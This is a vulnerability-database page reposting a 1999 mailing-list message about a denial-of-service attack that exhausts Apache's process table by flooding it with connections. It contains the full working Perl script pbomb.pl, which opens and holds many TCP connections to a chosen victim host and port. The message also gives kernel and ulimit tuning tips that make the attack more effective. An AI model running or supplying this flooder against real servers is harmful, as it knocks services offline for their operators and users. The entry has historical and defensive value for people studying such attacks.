Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

pbomb.pl

🗓️ 17 Aug 1999 00:00:00Reported by unknownType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 36 Views

Apache can be easily attacked via HTTP denial of service by opening many connections.

Code
`Date: Mon, 22 Feb 1999 15:49:45 -0800  
From: [email protected]  
To: [email protected]  
Subject: Re: Process table attack (from RISKS Digest)  
  
Apache is also quite vulnerable, at least to a http DOS... It's pretty  
easy to swamp it by opening HARD_SERVER_LIMIT connections.  
  
It's also usually unnecessary to use a root-spawned daemon for the attack,  
as long as you can find more than one listening daemon. The per-user  
limit is often something like 1/2 the size of the process table. I know  
that under Linux it is by default (MAX_TASKS_PER_USER = NR_TASKS/2).  
  
In experimentation, I found that there was no need to use multiple  
machines or anything like that to perform the attack using Linux or  
FreeBSD. Sample code is at http://www.riverstyx.net/stuff/pbomb.pl. All  
that needed to be done on FreeBSD was increase MAX_OPEN. On Linux,  
NR_OPEN and MAX_OPEN needed to be increased. You might also have to  
fiddle with /proc/sys/kernel/file-max and ulimit.  
  
On a related note, on a Linux machine with Apache's HARD_SERVER_LIMIT  
higher than Linux' MAX_TASKS_PER_USER it'll do some pretty interesting  
stuff. You'll end up with a couple hundred instances of Apache that are  
unkillable by any method, all sitting on port 80 and not responding to  
anything beyond the inital connection. The only solution that I know if  
is to reboot at that point...  
  
-------------------- pbomb.pl --------------------  
  
#!/usr/bin/perl  
  
use Socket;  
  
# opens a lot of connections to a given port on a given machine  
# by unknown  
  
# create a local filehandle so's not to fuck up the namespace. connect it to the server you want to die  
# and leave it alone...  
  
sub connect_me {  
local *FH;  
my $iaddr = gethostbyname('localhost');  
my $proto = getprotobyname('tcp');  
my $paddr = sockaddr_in(0, $iaddr);  
my($host);  
my $hisiaddr = inet_aton($victim) || die "unknown host";  
my $hispaddr = sockaddr_in($port, $hisiaddr);  
socket(FH, PF_INET, SOCK_STREAM, $proto) || die "socket: $!";  
connect(FH, $hispaddr) || die "bind: $!";  
# return the filehandle so it doesn't get wiped  
return *FH;  
}  
if (scalar @ARGV != 3) {  
print "usage: pbomb.pl <victim> <port> <count>\n";  
exit(0);  
}  
$victim = $ARGV[0];  
$port = $ARGV[1];  
$max = $ARGV[2];  
  
$count = 0;  
while (1) {  
push @handles, &connect_me;  
$count++;  
$staggered and sleep 3;  
if ($count == $max) {  
while (1) {  
sleep 1;  
}  
}  
}  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Aug 1999 00:00Current
7.4High risk
Vulners AI Score7.4
apache vulnerabilityhttp denial of serviceconnection floodingprocess tablelinux configuration.
36